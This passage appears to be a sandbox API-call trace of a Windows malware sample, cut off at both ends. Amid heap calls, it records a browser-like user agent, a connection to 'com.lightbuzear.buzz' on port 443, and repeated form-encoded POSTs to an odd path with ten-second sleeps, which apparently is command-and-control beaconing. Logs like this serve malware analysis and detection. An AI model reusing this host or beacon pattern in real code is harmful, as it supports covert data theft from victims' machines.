dwFlags=0x0, lpMem=0x47be5f0 | out: hHeap=0x4780000) returned 1 [0292.556] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0292.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0292.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0292.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0292.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0292.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0292.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0292.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0292.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0292.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0292.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ebb8 [0292.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0292.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ecf0 [0292.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebb8 | out: hHeap=0x4780000) returned 1 [0292.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0292.558] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecf0 | out: hHeap=0x4780000) returned 1 [0292.558] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be5c8 [0292.558] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0292.558] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0292.558] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5c8 | out: hHeap=0x4780000) returned 1 [0292.558] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5c8 [0292.558] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0292.558] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be320 [0292.558] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0292.559] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0292.559] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0292.559] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0292.559] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be320 | out: hHeap=0x4780000) returned 1 [0292.559] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0292.560] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0292.560] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0292.560] FreeLibrary (hLibModule=0x71570000) returned 1 [0292.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0292.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0292.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5a0 | out: hHeap=0x4780000) returned 1 [0292.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be550 | out: hHeap=0x4780000) returned 1 [0292.561] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be578 | out: hHeap=0x4780000) returned 1 [0292.561] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0292.561] Sleep (dwMilliseconds=0x2710) [0292.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0292.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0292.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0292.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0292.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0292.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0292.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0292.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0292.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0292.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb58 [0292.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0292.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ecf0 [0292.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb58 | out: hHeap=0x4780000) returned 1 [0292.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0292.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecf0 | out: hHeap=0x4780000) returned 1 [0292.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eb70 [0292.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0292.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0292.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0292.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0292.585] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0292.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0292.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0292.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0292.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0292.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0292.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0292.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0292.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0292.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0292.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec00 [0292.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0292.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec30 [0292.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec00 | out: hHeap=0x4780000) returned 1 [0292.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0292.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec30 | out: hHeap=0x4780000) returned 1 [0292.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be578 [0292.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0292.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0292.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be578 | out: hHeap=0x4780000) returned 1 [0292.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be730 [0292.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0292.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be3e8 [0292.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0292.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0292.587] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0292.587] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0292.587] FreeLibrary (hLibModule=0x71780000) returned 1 [0292.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be3e8 | out: hHeap=0x4780000) returned 1 [0292.588] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0292.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be370 [0292.588] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0292.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0292.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0292.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0292.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0292.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0292.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0292.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0292.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0292.589] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0292.589] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb58 [0292.589] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0292.589] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed08 [0292.589] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb58 | out: hHeap=0x4780000) returned 1 [0292.589] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0292.589] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed08 | out: hHeap=0x4780000) returned 1 [0292.589] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ea98 [0292.589] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be7d0 [0292.590] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be7d0 | out: hHeap=0x4780000) returned 1 [0292.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0292.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be7d0 [0292.599] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0292.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5a0 [0292.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0292.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0292.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0292.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0292.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0292.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0292.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0292.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0292.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0292.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec00 [0292.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0292.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eae0 [0292.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec00 | out: hHeap=0x4780000) returned 1 [0292.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0292.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0292.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eb28 [0292.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be3c0 [0292.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be3c0 | out: hHeap=0x4780000) returned 1 [0292.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0292.600] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0292.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0292.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0292.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0292.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0292.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0292.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0292.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0292.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0292.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0292.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ebd0 [0292.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0292.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eae0 [0292.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebd0 | out: hHeap=0x4780000) returned 1 [0292.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0292.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0292.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be320 [0292.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0292.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0292.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be320 | out: hHeap=0x4780000) returned 1 [0292.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be320 [0292.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0292.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be3e8 [0292.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0292.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0292.603] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0292.603] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0292.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be3e8 | out: hHeap=0x4780000) returned 1 [0292.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0292.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0292.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0292.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0292.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0292.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0292.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0292.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0292.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0292.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ebd0 [0292.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0292.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec30 [0292.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebd0 | out: hHeap=0x4780000) returned 1 [0292.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0292.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec30 | out: hHeap=0x4780000) returned 1 [0292.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be550 [0292.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0292.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0292.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be550 | out: hHeap=0x4780000) returned 1 [0292.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be550 [0292.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0292.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be640 [0292.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0292.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0292.613] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0292.613] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0293.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be640 | out: hHeap=0x4780000) returned 1 [0293.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0293.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0293.655] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0293.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0293.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0293.655] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0293.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0293.655] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0293.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0293.655] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0293.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0293.655] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0293.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eae0 [0293.655] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0293.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec00 [0293.655] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0293.655] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0293.656] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec00 | out: hHeap=0x4780000) returned 1 [0293.656] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be578 [0293.656] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0293.656] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0293.656] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be578 | out: hHeap=0x4780000) returned 1 [0293.656] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be578 [0293.656] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0293.656] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be3c0 [0293.656] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0293.656] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0293.657] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0293.657] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0293.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be3c0 | out: hHeap=0x4780000) returned 1 [0293.657] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0293.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0293.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0293.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0293.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0293.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0293.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0293.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0293.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0293.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0293.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec78 [0293.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0293.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec30 [0293.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0293.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0293.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec30 | out: hHeap=0x4780000) returned 1 [0293.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be3c0 [0293.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0293.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0293.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be3c0 | out: hHeap=0x4780000) returned 1 [0293.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be3c0 [0293.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0293.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be3e8 [0293.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0293.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: 